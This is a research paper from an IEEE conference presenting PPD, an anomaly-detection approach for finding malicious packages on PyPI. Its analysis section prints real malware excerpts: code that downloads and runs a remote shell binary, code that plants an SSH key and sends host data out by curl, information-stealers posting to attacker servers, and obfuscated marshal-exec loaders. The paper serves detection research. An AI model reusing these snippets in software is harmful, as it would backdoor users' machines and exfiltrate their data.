Malicious Packages Lurking in User-Friendly Python Package Index
2021 IEEE 20th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom) | 978-1-6654-1658-0/21/$31.00 ©2021 IEEE | DOI: 10.1109/TRUSTCOM53373.2021.00091
Abstract—Python has gradually become one of the most important programming languages, driven by the development of artificial intelligence. PIP, a package management tool for Python, offers one-click installation, allowing developers to reuse other people's code to speed up development. However, any registered member can easily upload packages to the repository that stores third-party packages. Attackers exploit this openness to poison the package index, i.e., to publish large numbers of malicious pip packages that install backdoors, gather information, etc. To understand the state of third-party packages in the Python community ecosystem, we establish criteria for judging whether a package's behavior is suspicious or malicious by analyzing the code logic of disclosed malicious packages. Based on these findings, we propose and implement Pip Poisoning Detector (PPD), an approach based on anomaly detection. PPD evaluated 228,723 packages and output 5,699 results; after human inspection, we found 63 malicious and 238 suspicious packages among them. The experimental results show that our approach is effective and can reduce the review workload by 97.51%.
Keywords—pip poisoning, anomaly detection, malicious Python

I. INTRODUCTION
In recent years, Python has grown rapidly into a favorite language of software developers. According to the programming language popularity ranking published by the TIOBE website [1], Python has overtaken C++ and C#, rising from 5th position in 2015 to 3rd position in 2020. Python is extremely popular among programmers, owing in part to the powerful Python Package Index (PyPI). PyPI is the authoritative index of all Python packages, and the accompanying repository is open to all registered members [2]. Much of the reusable code a project needs has already been packaged by others, so developers can use it easily and efficiently by executing a single command (e.g., pip install requests) [3]. Package Installer for Python (PIP) is an official package management tool provided by Python for downloading third-party packages from PyPI, and its installation steps are shown in Figure 1. This quick installation does improve development efficiency. But PyPI is open, which means that attackers can easily upload malicious packages to launch supply chain attacks. Such an attack targeting the PyPI ecosystem is known as pip poisoning.
The same situation also occurs in other community ecosystems, such as Npm for Nodejs [4] and RubyGems for Ruby. Because registries pay little attention to such attacks, the situation has become more serious. About 20% of malicious packages have survived in the package index for more than 400 days and have been downloaded more than 1,000 times [2]. Since the discovery of this poisoning method several years ago, the number of such attacks has increased exponentially [5]. For instance, MALOSS [2] identified 339 malicious packages in August 2019 after scanning more than one million packages in NPM, PyPI, and RubyGems. Three of these malicious packages, with more than 100,000 installations, were assigned CVE numbers. In December 2020, Tencent [6] reported that PyPI was poisoned by the malicious package covd. Attackers uploaded the package covd, whose name is similar to that of the package covid, to PyPI. They could then compromise the infected host and perform a series of activities, such as planting Trojans and installing backdoors.
Current detection methods include detection of combosquatting and typosquatting attacks [7], metadata analysis combined with static and dynamic analysis [2], and pure static analysis [8]. Each approach has its own advantages and disadvantages. For example, MALOSS has a high accuracy rate, but it needs to create an instance for each package it examines, which consumes huge computing resources; examining every package across the entire community ecosystem is especially expensive. By manually analyzing dozens of disclosed malicious packages, we find that malicious packages behave differently from benign packages in certain respects (malicious packages usually steal personal data from users and upload it to a remote server, or download Trojans for execution, etc.). From this perspective, we propose PPD, a detection approach for pip poisoning that combines static analysis and anomaly detection.
To illustrate our approach, take the malicious pip package request as an example, which was uploaded to PyPI by attackers in July 2020 [9]. When end-users mistakenly type the command pip install request (correctly, pip install requests), pip automatically executes the code in setup.py (the entry file of the installation process), which downloads a Trojan from the remote server and executes it. Specifically, setup.py imports a function license_check() from another file, hmatch.py. Attackers added this function to the original file to download Trojans and install backdoors. Current approaches do not inspect this imported code; they focus only on the contents of setup.py. Our approach, PPD, uses the abstract syntax tree to parse setup.py, fetches all the imported code, and joins it into setup.py, after formatting it correctly, to form the complete installation code.
Our main contributions are as follows:
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
distribute a version containing malicious code to end-users. An example of such an attack is eslint-scope [14], where the attacker compromised the ESLint maintainer's account and published a malicious version of eslint-scope to the package registry.
Publishing malicious packages. Attackers can easily publish packages containing malicious code to the registry because PyPI is open to registered members. Usually, attackers use names that are similar to those of popular packages to mislead end-users into downloading and installing their packages. Typical examples are jeIlyfish (a misspelling of jellyfish) and python3-dateutil (an imitator of the popular package dateutil) [15]. Surprisingly, jeIlyfish existed in PyPI for almost one year until it was discovered by security researchers.
Dependency confusion. Internal projects usually use standard, trusted code dependencies located in private repositories. However, if attackers create packages in public repositories that have the same names as the private, legitimate code dependencies, the malicious code can easily get into these projects [16]. Eventually, this malicious code follows the otherwise normal projects to end-users.

B. Package Behaviors
The above attack scenarios are ultimately designed to make end-users execute the malicious code, and setup.py is the file most likely to be manipulated by attackers [12]. Therefore, we categorize package behaviors as suspicious behaviors and malicious behaviors.
Suspicious behaviors. The following behaviors should be categorized as suspicious and should be verified subsequently.
• An external file (.sh or .exe) is executed in the code, regardless of whether the executable file is malicious.
• Many obfuscated characters are included in the code, regardless of whether these characters turn out to be malicious after de-obfuscation.
• The code downloads remote resources to the local environment and decompresses them, regardless of whether these resources are malicious.
• The code reads files and then executes them, regardless of whether the contents of these files are malicious.
• The code edits system configuration files or opens services privately; we can only determine that this is suspicious.
Malicious behaviors. The following behaviors should be directly categorized as malicious.
• Make external requests to download files and then execute them. If the file is merely downloaded or merely executed, it can only be considered suspicious.
• Create a reverse shell. A reverse shell is hard to discover, and attackers often use it to remotely control targets.
• After reading local sensitive data, send the data to a remote server. The ultimate goal of attackers launching a series of attacks is to access users' data.
• De-obfuscate code and then execute it. Attackers often bypass security detection through obfuscation, but to achieve their goal they must de-obfuscate and execute the code.
• Obvious malicious code or backdoors, such as deleting the current working directory or shutting down the machine.

IV. METHODOLOGY
Based on relevant studies, we propose a pip poisoning detection methodology that relies on the Levenshtein distance of package names and on features extracted from the source code. The implementation is divided into three parts: data pre-processing, feature extraction, and model training with result output, as illustrated in Figure 2. In the data pre-processing part, we split all packages into two types depending on their file suffix. The entry file for tar.gz is setup.py, while that for zip and whl is __init__.py or package-name.py (package-name stands for the package's name). We parse the entry file and get its imports. Then we traverse the entire package according to these imports and stitch the imported code into the entry file. After obtaining the complete installation code, the process enters the feature extraction part. We use the abstract syntax tree (AST) to parse the source code, accompanied by regular expressions (RegExp) to extract features. Combining the two offsets the inefficiency of AST and the inaccuracy of RegExp. The complete feature set consists of code features and Levenshtein distances of package names. We then feed this feature set to the third part, which outputs the final results after reverse cross-validation and model training. After de-duplicating these results, we obtain the packages that need manual review.

A. Data Collection and Pre-Processing
This subsection explains how we build the experiment data and extract the complete installation code.
Data collection. All the data in this paper are collected from PyPI and Tsinghua University's PyPI mirror site. First, we fetch the index file containing all package names and crawl every package's metadata according to this file. The crawling procedure uses multi-threading to speed up metadata fetching. Then we normalize the metadata of each package to extract the download link for the latest version. When all packages are downloaded, we extract setup.py from the tar.gz packages, and __init__.py or package-name.py from the zip and whl packages. Finally, we have the entry file of every package.
Pre-processing. For the entry file (e.g., setup.py for tar.gz), we first use AST to parse the file. Because this file is the entry point of the whole pip installation process, it must be parsable as an AST. While traversing every node of the tree, we pick out the Import and ImportFrom child nodes and collect all the imports from them. Following this, we compare these imports with Python's built-in libraries to identify third-party imports. Finally, we traverse the entire package to find files that match these third-party imports, and then merge these files with the entry file to build the complete installation code.
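The pre-processing step described above can be sketched roughly as follows. This is a minimal illustration under stated assumptions, not the authors' implementation: the function names `non_stdlib_imports` and `stitch`, the use of `sys.stdlib_module_names` (Python 3.10+) as the list of built-in libraries, and the in-memory `package_files` mapping are all hypothetical choices made for the example.

```python
import ast
import sys

# Assumption: on Python 3.10+ sys.stdlib_module_names lists the standard
# library; on older interpreters we fall back to the compiled-in modules only.
STDLIB = frozenset(getattr(sys, "stdlib_module_names", sys.builtin_module_names))


def non_stdlib_imports(source: str) -> set[str]:
    """Return top-level names imported by `source` that are not standard library."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom):
            if node.module:
                names.add(node.module.split(".")[0])
            else:
                # "from . import x": the imported names are local modules
                names.update(alias.name for alias in node.names)
    return {name for name in names if name not in STDLIB}


def stitch(entry_source: str, package_files: dict[str, str]) -> str:
    """Prepend every imported module that ships inside the package to the entry file."""
    parts = []
    for name in sorted(non_stdlib_imports(entry_source)):
        local = package_files.get(name + ".py")
        if local is not None:
            parts.append(f"# --- merged from {name}.py ---\n{local}")
    parts.append(entry_source)
    return "\n".join(parts)
```

For the request example from the introduction, an entry file containing `from hmatch import license_check` would yield `hmatch` as a non-standard import, and `stitch` would pull the body of `hmatch.py` in front of `setup.py` so that later feature extraction sees the hidden function.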
Figure 2: The structure of our methodology
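The package-name part of the feature set in Figure 2 relies on the Levenshtein distance. The sketch below shows one way such a feature could be computed. The helper `nearest_popular` and the list of popular names passed to it are assumptions made for illustration; the paper does not specify which reference names it compares against.

```python
def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + cost))  # substitution or match
        prev = cur
    return prev[-1]


def nearest_popular(name: str, popular: list[str]):
    """Return (distance, popular_name) for the closest popular package, or None."""
    candidates = ((levenshtein(name, p), p) for p in popular if p != name)
    return min(candidates, default=None)
```

A name such as request sits at distance 1 from requests, and jeIlyfish at distance 1 from jellyfish, so a small distance to a well-known package is a natural signal for typosquatting.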
TABLE I: The code features we picked and why we picked them
Feature | Reason
… | … pre-prepared servers.
Directory traversal | Attackers often obtain directory information on the target.
File manipulation | Attackers often upload, download or modify files.
Sensitive file reading | Attackers often read sensitive files on the target.
Compression and decompression | Attackers often download and decompress malicious files, or compress local files in order to send them to a remote server.
Obfuscation and de-obfuscation | Attackers often obfuscate malicious code to bypass detection and then de-obfuscate it for execution.
Importing other files | Attackers often import some external files to bypass the methodology that only detects setup.py.
The longest string | The obfuscated code is often very long.
IP or URL address | Attackers often embed their IP or URL address in malicious code.
Fields in entry points | Attackers often use entry points to execute malicious code in a covert way.

Figure 3: Setup.py code length distribution (Unit: characters). [Bar chart; x-axis: Code Length, in bins 0-9, 10-19, 20-29, 30-39, 40-49, 50-59, 60-69, 70-79, 80-89, 90-99; y-axis: Number of Packages.]
TABLE II: Specific ground-truth in feature selection
(a) Command execution
Type | Function
Built-in | os.system(), os.popen(), os.exec*(), os.spawn*(), subprocess.Popen(), subprocess.getoutput(), subprocess.getstatusoutput(), subprocess.call(), subprocess.run(), subprocess.check_call(), commands.getstatusoutput(), commands.getoutput()
3rd-party | pexpect
(b) External connection
Type | Version | Libraries
Built-in | python2.x | httplib, urllib, urllib2, socket
Built-in | python3.x | http.client, urllib, urllib3, socket
3rd-party | all version | requests, aiohttp, selenium

However, the following problems are often encountered when doing anomaly detection.
P1: When the dimensions of the features are large, a huge dataset is required. Because of the large number of packages in the PyPI ecosystem (258,426 in October 2020), we can build a huge dataset.
P2: Some samples in low-density areas will be misclassified as abnormal samples. We grouped packages whose code is shorter than 100 characters into intervals of 10 characters and obtained their distribution, as shown in Figure 3. Packages with code lengths of 10 or less account for 43% of the total, and for such short code we can tell at a glance whether it is malicious. Therefore, we excluded these packages. In addition to excluding packages with short code, we also exclude packages whose code we cannot access, such as packages that have been withdrawn or removed by their authors.
P3: Pre-assumed probability distributions strongly influence model performance. We pick the Isolation Forest (iForest) algorithm [18], which has been widely used in many fields, such as docker container anomaly monitoring [19] and detection of covert data integrity assault [20]. As an unsupervised anomaly detection method, iForest is well suited to the challenge we encountered: it is insensitive to noise or anomalies in the training data. Specifically, iForest recursively and randomly splits the dataset until all sample points are isolated. Under this random splitting strategy, anomaly points usually have short paths. Since iForest uses segmentation to isolate anomaly points instead of excluding them by describing normal points, it almost eliminates the need to predefine the probability distribution of normal samples, which solves the third problem. But the results are still influenced to some extent by potentially malicious packages, because many malicious samples aggregated in a small sample may lead to false positives.
Reverse cross-validation. Even though we have solved almost all the problems above, relying on the iForest model alone is not enough to detect malicious packages in PyPI. When dividing the data into training and test sets, we cannot guarantee that the training set contains no potentially malicious packages, which affects the final results to some extent. Thus, we use a method called reverse cross-validation (RCV) [21]. Taking 3-fold RCV as an example, we divide the dataset into three parts, use one part as the training set and the other two parts as the test set, and then perform cycle training. Because RCV selects only one part as the training set, it helps avoid false negatives caused by learning the wrong cases and improves the detection accuracy rate. At the same time, it increases the false-positive rate because the training set is smaller. To improve the detection accuracy and reduce the false-positive rate, we used 3-fold, 5-fold and 10-fold RCVs to process the dataset. Finally, we de-duplicate the training output to get the final result.

V. EXPERIMENTAL
A. Results Overview
We used a local computer running Windows 10 with 16GB memory and 8 x 2.80GHz Intel CPUs to crawl the entire PyPI ecosystem in December 2020 (287,915 packages in total), but we obtained download links from the index for, and downloaded, only 228,887 packages. Part of the reason is that it takes
time for the crawler to download all packages. Between the time we record a package name and the time we download the package, the author could remove or withdraw it. The other part is that the package name exists in PyPI, but PyPI does not provide a download link for it (e.g., 01changer, 2013007-pyh, and other packages in https://pypi.org/simple/). Then we extract the complete installation code of the entry file, including the functions or imported files. After filtering out the previously mentioned packages that need to be excluded, we examined the remaining 228,723 pip packages and obtained 5,699 anomaly samples after de-duplication. Through manual review, we found 301 packages with malicious or suspicious behavior (63 malicious, 238 suspicious). The distribution of the different types of malicious packages we found is shown in Figure 4.

(One-Class SVM) model, which is also an anomaly detection method. But OCSVM needs to describe the normal samples, and if the normal samples are mixed with malicious samples, its output is seriously affected. Eventually, the OCSVM model verified only 11 packages successfully, accounting for 26.82%. We categorize all detected packages by the behavioral classification in subsection III-B and analyze the most typical packages in Table III.

TABLE III: Verification of typical malicious pip packages
Package Name | Description | Hit or not
jeIlyfish | Steal sensitive files such as SSH and GPG keys and send them to the attacker's server. | yes
trustypip, pwniepip | Creating a reverse shell. | yes
request | Stealing sensitive information and digital currency keys, planting persistent backdoors, etc. | yes
libpeshka | Get the malicious script from the remote server and execute it, then persist it in .bashrc. | yes
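The anomaly list reviewed above is produced by reverse cross-validation followed by de-duplication: one fold is used for training, the remaining folds are scored, the roles rotate, and the outputs of the 3-fold, 5-fold and 10-fold runs are merged. The sketch below illustrates only that control flow. It is not the authors' code: `toy_detector` is a deliberately simple stand-in (median and median absolute deviation on a single numeric feature) used in place of iForest so that the example has no third-party dependencies, and the sample format `(name, value)` and the threshold are assumptions.

```python
import random
from statistics import median


def toy_detector(train, test, threshold=3.0):
    """Stand-in for iForest: flag test items far from the training median."""
    values = [value for _, value in train]
    med = median(values)
    mad = median(abs(v - med) for v in values) or 1.0  # avoid division by zero
    return {name for name, value in test if abs(value - med) / mad > threshold}


def reverse_cross_validation(samples, k, detect, seed=0):
    """Train on ONE fold, score the other k-1 folds, and rotate through all folds."""
    shuffled = samples[:]
    random.Random(seed).shuffle(shuffled)
    folds = [shuffled[i::k] for i in range(k)]
    flagged = set()
    for i, train in enumerate(folds):
        test = [s for j, fold in enumerate(folds) if j != i for s in fold]
        flagged |= detect(train, test)
    return flagged


def candidates_for_review(samples, ks=(3, 5, 10), detect=toy_detector):
    """Merge the outputs of several RCV runs; the set union de-duplicates them."""
    merged = set()
    for k in ks:
        merged |= reverse_cross_validation(samples, k, detect)
    return sorted(merged)
```

Because each run trains on a small fold, a package can be reported by several runs; collecting the names in a set is what keeps each package in the review list only once.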
Listing 2: Malicious code of print-structures
    def run(self):
        os.system('wget http://118.128.134.45:8009/getshell.elf')
        os.system('chmod +x ./getshell.elf')
        os.system('./getshell.elf &')
        os.remove('./getshell.elf')

Listing 3: Malicious code of protobuff
    def do_thing():
        returncode = os.system("""
        {
        EXTERNAL_IP=$(curl https://ipinfo.io/ip)
        ALL_IPs=$(dnsdomainname -A)
        ALL_HOSTNAMEs=$(dnsdomainname -I)
        ALL_DOMAINs=$(grep "server_name" -ri /etc/nginx/sites-enabled/*; grep "ServerName" -ri /etc/apache2/sites-enabled/*)
        LINUX_INFO=$(uname; uname -or; lsb_release -irc)
        ENCODED_RESULT=$(echo "${USER}|||${USERNAME}|||${EXTERNAL_IP}|||${ALL_HOSTNAMEs}|||${ALL_IPs}|||${ALL_DOMAINs}|||${LINUX_INFO}" | base64)

        echo "ssh-rsa AAA... user@host" >> ~/.ssh/authorized_keys
        curl --data payload="protobuff~~~${ENCODED_RESULT}" "http://83.97.20.215/stats.php"
        }
        &> /dev/null
        """);

Listing 4: Malicious code of tst-conan
    def checkVersion():
        user_name = getpass.getuser()
        hostname = socket.gethostname()
        os_version = platform.platform()
        ip = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
        package = 'tstconan'
        vid = user_name+"###"+hostname+"###"+os_version+"###"+ip+"###"+package
        request.urlopen(r'http://139.199.57.156/tst.php', data='vid='.encode('utf-8')+base64.b64encode(vid.encode('utf-8')))

Listing 5: Malicious code of reque6t
    def telemetry(is_sudo, sender, original_name, new_name):
        url = "http://mf2pru.ceye.io"
        data = encoder(dict(
            is_sudo=is_sudo,
            sender=sender,
            original_name=original_name,
            new_name=new_name,
            version=sys.version
        ))
        request(url, encode(data), timeout=0.1)

Listing 6: Malicious code of afgcrk
    exec marshal.loads('c\x00...\x0c\x01')
    z = [168, 171...,214, 222]
    _ = [103, 66...,4, 34]
    __ = [927..., 927]
    OoO_ = [45, 42...,39, 41]
    exec marshal.loads('c\x00...\x0c\x01')
    OO = lambda _ : marshal.loads(_)
    u = (({}<())-({}<()))
    p = (({}<())-({}<()));v = []
    exec((lambda:((()>())+(()<()))).func_code.co_lnotab).join(map(chr,[(....])))
    exec OO("".join([chr(i) for i in lx]).decode("hex"))

tst-conan. tst-conan first fetches the username, hostname, system version and other information, then determines whether the operating system is Windows or Linux, and gets the system language. Finally, it obtains the local IP address by opening a UDP socket to 8.8.8.8 on port 53 (the DNS port) and merges it with the information obtained earlier before sending it to http://139.199.57.156/tst.php, as shown in Listing 4. Malicious packages similar to tst-conan and disclosed by Ohm et al. [17] include PyYAML, pythom-mysql, python-openssl, etc.
reque6t. reque6t is a malicious package released into the PyPI ecosystem by security researchers; we also found similar packages such as r-quest and req-est. The setup.py code of this package first tries to create a file called pwn3d.txt in the root directory to determine whether it has root privileges. Then it sends information about whether it is running with high privileges, the package name, the package manager, etc. to http://mf2pru.ceye.io, as shown in Listing 5. Finally, it also tries to read /etc/passwd and /etc/passwd.
afgcrk. afgcrk loads Python code objects via marshal and then performs malicious actions after obfuscation using lambda functions. Packages such as crkpak and crkpk are similar. Although the specific implementations differ, the behavior of these malicious pip packages is to load a Python code object and execute it; the code is shown in Listing 6.

D. Discussion
Our approach can help the managers of PyPI reduce the cost of manual review to some extent. We reduce the number of packages to be inspected from more than 220,000 to just over 5,600. If the entire PyPI ecosystem is considered for inspection, our approach reduces the work by 97.51%. In terms of the results, our approach is effective for fully functional malicious pip packages. After analysis, however, we found that our approach does not work well for detecting some malicious PyPI packages with little functionality, such as 00000a, which uses only one external connection and one ls command.
In addition, during our manual review of the 301 packages in the output, we noticed that 81 of the 238 suspicious packages read files and execute them, while 77 packages download files. Although these packages execute seemingly normal files such as version.py, reading files and executing them should not be allowed, because end-users cannot determine whether these files are required for the installation or are carefully forged by an attacker. As for file downloading, third-party packages should ship complete code and should not need to download anything else in the background. This behavior should also be disallowed because end-users have no way to ensure the security of the downloaded files. The two cases mentioned above are the most frequent ones, and we call on PyPI officials to standardize the format of the setup.py file to disable silent background downloads and other dangerous operations. A reasonable approach would be to leave these operations to the users instead of the third-party packages.
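The "read a file, then execute it" pattern discussed above is easy to spot statically in Python 3 sources. The following sketch shows one possible AST check. It is an illustration rather than part of PPD: the function name `find_read_then_exec` is hypothetical, and the check only recognizes the direct form in which a `.read()` or `.read_text()` call is nested inside the first argument of `exec` or `eval`.

```python
import ast

EXEC_NAMES = {"exec", "eval"}
READ_METHODS = {"read", "read_text"}


def _contains_read_call(node: ast.AST) -> bool:
    """True if the expression contains a call to a method named read/read_text."""
    for sub in ast.walk(node):
        if (isinstance(sub, ast.Call)
                and isinstance(sub.func, ast.Attribute)
                and sub.func.attr in READ_METHODS):
            return True
    return False


def find_read_then_exec(source: str) -> list[int]:
    """Return line numbers where exec/eval is applied directly to file contents."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id in EXEC_NAMES
                and node.args
                and _contains_read_call(node.args[0])):
            hits.append(node.lineno)
    return sorted(hits)
```

A setup.py containing `exec(open("version.py").read())` would be reported on the corresponding line. Code that first stores the file contents in a variable, or Python 2 sources that use the `exec` statement (which `ast.parse` rejects under Python 3), would need additional handling.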
VI. CONCLUSIONS AND FUTURE WORK
A. Conclusions
We crawl all packages in the PyPI ecosystem and establish preliminary criteria for judging whether a package's behavior is suspicious or malicious by analyzing the behavioral features of disclosed malicious pip packages. We combine two techniques, AST and RegExp, to extract code features and construct feature sets together with package name features. Finally, by using the iForest algorithm, which performs well on multi-dimensional features, we find malicious pip packages lurking in the PyPI ecosystem. Although only a limited number of malicious pip packages are detected, the results show that our approach works. We have analyzed the lifecycle of the pip installation process, which starts with a one-click command (e.g., pip install requests) entered by end-users. While collecting samples, we found two types of installation packages (tar.gz, whl/zip) in the PyPI ecosystem and proposed a solution to extract the complete setup.py code for each of them.
Following these findings, we propose and implement a pip poisoning detection approach based on the iForest algorithm, and combine it with multiple reverse cross-validation and de-duplication to ensure the validity of the results. From 228,723 pip packages, we get 5,699 packages awaiting manual review. After reviewing them, we find 301 undisclosed suspicious or malicious packages. For the managers of the PyPI ecosystem, whose task is to evaluate the entire community, our approach reduces the workload by 97.51%.

B. Future Work
When dealing with malicious packages that have fewer features, our approach performs poorly, which might be caused by the fact that we use an anomaly detection mindset. Our approach is based on the assumption that malicious/anomaly packages are similar to one another but different from benign/normal packages. However, the majority of malicious packages are functionally complex, so those with fewer functions are difficult for us to detect. In our future work, we intend to tackle this problem from the dimension of code similarity. During our experiments, we found that the malicious code parts in most malicious packages are similar; for example, the packages libcurl, libhtml5, mateplotlib, numipy, etc. all contain the function checkVersion().
At the same time, we notice that such poisoning of package registries is also serious in Npm and RubyGems [2]. We have done a preliminary evaluation of the npm ecosystem while improving PPD. After randomly selecting 300,000 packages, we found 16 suspicious or malicious npm packages, one of which, named monent, has been removed. We will continue to adapt our methodology to better detect malicious packages lurking in Npm and RubyGems.

ACKNOWLEDGMENT
This research is funded by the National Natural Science Foundation of China (No.61902265), Sichuan Science and Technology Program (No.2020YFG0047, No.2020YFG0374).

REFERENCES
[1] I. TIOBE, "Tiobe index," Retrieved from Tiobe Index: https://www.tiobe.com/tiobe-index, 2020.
[2] R. Duan, O. Alrawi, R. P. Kasturi, R. Elder, B. Saltaformaggio, and W. Lee, "Towards measuring supply chain attacks on package managers for interpreted languages." NDSS, 2021.
[3] I. Pashchenko, D.-L. Vu, and F. Massacci, "A qualitative study of dependency management and its security implications," in Proceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security, 2020, pp. 1513–1531.
[4] M. Zimmermann, C.-A. Staicu, C. Tenny, and M. Pradel, "Small world with high risks: A study of security threats in the npm ecosystem," in 28th USENIX Security Symposium (USENIX Security 19), 2019, pp. 995–1010.
[5] A. Almubayed, "Practical approach to automate the discovery and eradication of opensource software vulnerabilities at scale," Blackhat USA, 2019.
[6] T. S. R. C. Xnianq, "Pypi official repository is poisoned by covd malicious packages," Retrieved from: https://security.tencent.com/index.php/blog/msg/170, 2020.
[7] D.-L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, "Typosquatting and combosquatting attacks on the python ecosystem," in 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW). IEEE, 2020, pp. 509–514.
[8] M. Čarnogurskỳ, "Attacks on package managers."
[9] E. Debuggers, "Don't pip install "request" instead of "requests". it is a trojan!" Retrieved from: https://ethicaldebuggers.com/dont-pip-install-request-instead-of-requests-it-is-a-trojan/, 2020.
[10] M. Taylor, R. K. Vaidya, D. Davidson, L. De Carli, and V. Rastogi, "Spellbound: Defending against package typosquatting," arXiv preprint arXiv:2003.03471, 2020.
[11] M. Ohm, A. Sykosch, and M. Meier, "Towards detection of software supply chain attacks by forensic artifacts," in Proceedings of the 15th International Conference on Availability, Reliability and Security, 2020, pp. 1–6.
[12] D. L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, "Towards using source code repositories to identify software supply chain attacks," in Proceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security, 2020, pp. 2093–2095.
[13] K. Garrett, G. Ferreira, L. Jia, J. Sunshine, and C. Kästner, "Detecting suspicious package updates," in 2019 IEEE/ACM 41st International Conference on Software Engineering: New Ideas and Emerging Results (ICSE-NIER). IEEE, 2019, pp. 13–16.
[14] O. Foundation and other contributors, "Postmortem for malicious packages published on july 12th, 2018," Retrieved from: https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes, 2018.
[15] H. Denbraver, "Malicious packages found to be typo-squatting in python package index," Retrieved from: https://snyk.io/blog/malicious-packages-found-to-be-typo-squatting-in-pypi, 2019.
[16] A. Bannister, "Dependency confusion attack mounted via pypi repo exposes flawed package installer behavior," Retrieved from: https://portswigger.net/daily-swig/dependency-confusion-attack-mounted-via-pypi-repo-exposes-flawed-package-installer-behavior, 2021.
[17] M. Ohm, H. Plate, A. Sykosch, and M. Meier, "Backstabber's knife collection: A review of open source software supply chain attacks," in International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment. Springer, 2020, pp. 23–43.
[18] F. T. Liu, K. M. Ting, and Z.-H. Zhou, "Isolation forest," in 2008 Eighth IEEE International Conference on Data Mining. IEEE, 2008, pp. 413–422.
[19] Z. Zou, Y. Xie, K. Huang, G. Xu, D. Feng, and D. Long, "A docker container anomaly monitoring system based on optimized isolation forest," IEEE Transactions on Cloud Computing, 2019.
[20] S. Ahmed, Y. Lee, S.-H. Hyun, and I. Koo, "Unsupervised machine learning-based detection of covert data integrity assault in smart grid networks utilizing isolation forest," IEEE Transactions on Information Forensics and Security, vol. 14, no. 10, pp. 2765–2777, 2019.
[21] E. Zhong, W. Fan, Q. Yang, O. Verscheure, and J. Ren, "Cross validation framework to choose amongst models and datasets for transfer learning," in Joint European Conference on Machine Learning and Knowledge Discovery in Databases. Springer, 2010, pp. 547–562.